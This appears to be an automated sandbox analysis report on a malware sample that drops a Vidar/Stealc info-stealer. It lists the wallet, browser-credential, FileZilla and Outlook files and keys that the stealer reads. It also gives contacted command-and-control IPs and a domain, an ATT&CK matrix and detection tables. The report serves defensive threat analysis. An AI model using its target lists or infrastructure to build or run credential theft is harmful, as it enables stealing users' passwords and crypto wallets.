                    Yara detected Vidar stealer
                    Source: Yara matchFile source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
                    Source: 1248.tmp.exeString found in binary or memory: \Coinomi\Coinomi\wallets\
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
                    Source: 1248.tmp.exeString found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Source: 1248.tmp.exeString found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
                    Tries to harvest and steal Bitcoin Wallet information
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-walJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                    Source: Blank.pifBinary or memory string: WIN_81
                    Source: Blank.pifBinary or memory string: WIN_XP
                    Source: Blank.pifBinary or memory string: WIN_XPe
                    Source: Blank.pifBinary or memory string: WIN_VISTA
                    Source: Blank.pifBinary or memory string: WIN_7
                    Source: Blank.pifBinary or memory string: WIN_8
                    Source: Blank.pif.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 16.2.1248.tmp.exe.a00e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.1248.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.3.1248.tmp.exe.2330000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.1248.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.3.1248.tmp.exe.2330000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.1248.tmp.exe.a00e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.3346073741.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.3002753873.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00422A0C Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,15_2_00422A0C
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00421D36 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,15_2_00421D36
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C320C40 sqlite3_bind_zeroblob,16_2_6C320C40
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C320D60 sqlite3_bind_parameter_name,16_2_6C320D60
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C248EA0 sqlite3_clear_bindings,16_2_6C248EA0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C320B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,16_2_6C320B40
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C246410 bind,WSAGetLastError,16_2_6C246410

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		2
                    Valid Accounts                    		1
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		21
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts12
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol4
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		2
                    Valid Accounts                    		3
                    Obfuscated Files or Information                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		23
                    Software Packing                    		NTDS148
                    System Information Discovery                    		Distributed Component Object Model21
                    Input Capture                    		114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		1
                    Timestomp                    		LSA Secrets151
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials141
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                    Masquerading                    		DCSync14
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Valid Accounts                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                    Access Token Manipulation                    		Network Sniffing1
                    Remote System Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
                    Process Injection                    		Input Capture1
                    System Network Configuration Discovery                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530592 Sample: hlyG1m5UmO.exe Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 88 tjKhgPhoLOjoHpkZoehqyy.tjKhgPhoLOjoHpkZoehqyy 2->88 90 post-to-me.com 2->90 104 Multi AV Scanner detection for domain / URL 2->104 106 Suricata IDS alerts for network traffic 2->106 108 Found malware configuration 2->108 110 11 other signatures 2->110 14 hlyG1m5UmO.exe 26 2->14         started        signatures3 process4 process5 16 cmd.exe 2 14->16         started        file6 60 C:\Users\user\AppData\Local\...\Blank.pif, PE32 16->60 dropped 98 Uses ping.exe to sleep 16->98 100 Drops PE files with a suspicious file extension 16->100 102 Uses ping.exe to check the status of other devices and networks 16->102 20 Blank.pif 16->20         started        23 cmd.exe 2 16->23         started        25 conhost.exe 16->25         started        27 7 other processes 16->27 signatures7 process8 signatures9 120 Injects a PE file into a foreign processes 20->120 29 Blank.pif 1 17 20->29         started        process10 dnsIp11 94 176.113.115.37, 49979, 49981, 80 SELECTELRU Russian Federation 29->94 96 post-to-me.com 104.21.56.70, 443, 49978 CLOUDFLARENETUS United States 29->96 82 C:\Users\user\AppData\Local\...\1248.tmp.exe, PE32 29->82 dropped 84 C:\Users\user\...\ScreenUpdateSync[1].exe, PE32 29->84 dropped 33 1248.tmp.exe 52 29->33         started        file12 process13 dnsIp14 86 62.204.41.176, 49980, 80 TNNET-ASTNNetOyMainnetworkFI United Kingdom 33->86 62 C:\Users\user\AppData\...\softokn3[1].dll, PE32 33->62 dropped 64 C:\Users\user\AppData\Local\...\seed[1].exe, PE32 33->64 dropped 66 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 33->66 dropped 68 11 other files (3 malicious) 33->68 dropped 112 Detected unpacking (changes PE section rights) 33->112 114 Detected unpacking (overwrites its own PE header) 33->114 116 Tries to steal Mail credentials (via file / registry access) 33->116 118 6 other signatures 33->118 38 cmd.exe 33->38         started        40 WerFault.exe 33->40         started        43 WerFault.exe 33->43         started        45 10 other processes 33->45 file15 signatures16 process17 file18 47 LocalCGIDAAAKJJ.exe 38->47         started        50 conhost.exe 38->50         started        70 C:\ProgramData\Microsoft\...\Report.wer, Unicode 40->70 dropped 72 C:\ProgramData\Microsoft\...\Report.wer, Unicode 43->72 dropped 74 C:\ProgramData\Microsoft\...\Report.wer, Unicode 45->74 dropped 76 C:\ProgramData\Microsoft\...\Report.wer, Unicode 45->76 dropped 78 C:\ProgramData\Microsoft\...\Report.wer, Unicode 45->78 dropped 80 7 other malicious files 45->80 dropped process19 signatures20 124 Multi AV Scanner detection for dropped file 47->124 52 cmd.exe 47->52         started        process21 signatures22 122 Uses ping.exe to sleep 52->122 55 PING.EXE 52->55         started        58 conhost.exe 52->58         started        process23 dnsIp24 92 2.2.2.2 FranceTelecom-OrangeFR France 55->92

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    hlyG1m5UmO.exe11%VirustotalBrowse
                    hlyG1m5UmO.exe8%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\freebl3.dll0%ReversingLabs
                    C:\ProgramData\mozglue.dll0%ReversingLabs
                    C:\ProgramData\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\nss3.dll0%ReversingLabs
                    C:\ProgramData\softokn3.dll0%ReversingLabs
                    C:\ProgramData\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalCGIDAAAKJJ.exe55%ReversingLabsWin32.Trojan.SelfDel
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\seed[1].exe55%ReversingLabsWin32.Trojan.SelfDel
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\464151\Blank.pif5%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    post-to-me.com2%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                    https://mozilla.org0/0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://upx.sf.net0%URL Reputationsafe
                    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%URL Reputationsafe
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%URL Reputationsafe
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
